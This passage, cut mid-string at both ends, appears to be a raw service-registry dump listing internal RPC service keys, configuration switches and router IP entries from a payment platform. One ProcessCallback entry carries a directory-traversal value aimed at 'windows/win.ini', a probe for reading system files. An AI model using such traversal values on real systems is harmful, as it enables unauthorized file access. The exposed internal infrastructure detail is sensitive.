D#@#SOFA.CONFIG","com.alipay.fc.argo.service.facade.NoVersionObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.defincustomer.facade.api.user.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.apfasmng.common.service.facade.metering.MeteringFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_LINYA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydss.common.service.facade.indicator.IndicatorDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:loadcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.gateway.GatewayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchainabsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.maxTableIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.44.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_FOO#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.agdsroalipay.facade.setting.GeneralSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.common.service.facade.decision.DecisionDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.service.governance.facade.AppVersionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_workOrderApproveCancelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.plugin.CurrentCommandService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.facade.SettleInfoCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.adsense.AdsenseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.PodUnitMemberUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.manager.facade.CouponTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.miniapp.api.AppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:zhimacheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.UserBetaSwitchConfig.lowerBound,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.report.TradeReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.ReconcileBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.app.PublicAppCreateCountLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.protocol.UserAuthStateSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.location.LocationAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.zcache.switcher.bankcardTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.rzone.ArOperateServiceRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.performance.MemberLabelHFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:zmcustprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.CustomCertificateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.UserFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskOptInfoServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.client.qaZQueue1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kabaocore.service.spi.OpenCardInvokeService:1.0:mrchmembercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.apipay.instportal.common.service.facade.spi.gateway.ApiInvokeService:1.0:stocksupervise@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","sofa.service.app:1.0@SYSTEM#@#DEFAULT_INSTANCE_ID#@#SYSTEM","com.alipay.mobilefun.common.service.facade.PollManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.interact.api.InteractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:${paycore_schedule_executer}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","PordApiSpecRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.contractQueryFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.edubizsp.core.service.cache.TbaseCzoneCacheManagerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0:current_idc_other_zone@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:fpdecisionplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsAftransQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.DataAssetsMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleAnalyzeDRMStrategy.runAfterAnalyze,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ZPAAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.facade.CodeApiGFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.paybox.SmartPayBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.dapply.MaintenanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsInquiryApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_RCAUDIT_RUNNING_INSTANCE_COMPENSATE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.directory.VersionedDirectoryQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantRelationPageQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.core.service.HisNetValueService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.partner.PartnerRoleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue50#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.coreQualityPlus.common.facade.service.api.NodeDataInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtAssertCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcFastLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zbdm.common.service.facade.lineage.LineageOdpsBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.UserIndexBlackListDrmResource.blacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.190.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:userview_cz@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.pausedCampRecycleBudgetStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.204.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:paycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ADDP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.237.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchExterfaceInvokeToUtpResource.unfreezeRefundStrategy,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.memberprod.mashup.service.account.open.BatchRegisterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antchaos.client.api.AwatchAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publichome.biz.service.impl.test.UserBehaviorRecordTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.38.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins_ipp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.61.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.2.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_PAYACC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmerchant.service.facade2.ActivityQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antfarm.common.service.facade.AntfarmXlightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.imdop.common.service.facade.OpCouponService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.ceres.CeresSupplierQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue52:onelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_CHARGEFRONT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.publish.PublishApi:1.0:dataphin-publishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudatlas.accatracequery.facade.TradeCommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.112.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.232.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofaboot.webdemo.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.playbackmng.playback.api.PlaybackInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.AlipayRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bkpromoscene.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservicesinspect.common.service.integration.mockcenter.MockcenterClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.189.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.spi.RpcSpi:1.0:authweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:admgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.core.service.schedule.execute.ScheduleExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.asset.service.PageResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.cdecision.label.facade.JbPlatformOrgConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECURITYCAP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.ProfileConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecprodcfg.common.service.topicdata.facade.AccessKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventIndexQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientExceptionManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.FileOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundAgentTopUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.FinfoTransService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.ActionServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.194.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanpromo.service.JiebeiPointAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.commonCmdProcessThreadPool.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mrchselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.security.SecurityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.11.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dpcscgateway.common.service.facade.FlowLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.product.service.SharedProductQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instoperation.common.service.facade.autopress.PressTestPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.neardata.decide.service.DiscountDecideService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.event.EventSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.zoneSwitchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.itemcore.common.service.facade.InventoryCZoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.msgopprod.common.service.facade.admin.MsgTemplateOperateAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepcustprod.facade.api.auth.EpCreditAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:utraffictrip@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.crowdcup.hsf.CrowdSegmentService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.97.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkloancommon.common.service.facade.arrealm.credit.api.LoanCreditCenterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.queryOutSelfCure,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.211.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.common.service.facade.TinyappQualityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.188.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yqdataservice.common.service.facade.base.BaseUserRoleAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:guarcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.strategy.api.StrategyRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_ZIAN_TEST3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cif:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.ctuUidBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.app.AppActionServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountDailycutManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.isvForMerchantSmidFileMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.fixSyncFlgJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.shop.ShopNoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:bumnguserservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.understand.ContentFeatureTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppConfManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.AccountListManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zcache.tbase.addpLoadtestTair.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.176.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.client.filechange51#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accustomerweb.common.service.facade.AliyunAccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.rfm.AdapterRfmProductServiceFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:securityemc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.SyncEventSenderSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adpc.common.service.facade.DataCumulateTaskConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.UserExperienceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.notify.NotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zhimago_expire_msg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.PaymentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianapi.client.SystemExterfaceInvokeService:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.WordMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcarts.common.service.facade.CartServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.service.rpc.AdvertReachRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.component.PublicComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.market.manage.FwOfferingManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininsightmng.common.service.facade.strategy.api.dx.DxVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.quotation.QuotationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcenter.common.service.facade.kbcscenter.KbConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.smcp.facade.center.ScMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finstore.common.service.facade.fop.mng.PrizeWinnerListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.DataStructDefinitionManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.closeQueryCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.lotteryBingoUidList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.operator.common.service.facade.OperatorRelAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthSMSInvitationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.common.SecuInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-originPriceAnnualCancle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.SolutionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreementconfig.ConfigDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.profile.UserDimensionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdispatcher.common.service.dispatch.facade.api.ServiceDispatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","pcloanoperation@msgbrokerMosn#@#DEFAULT_INSTANCE_I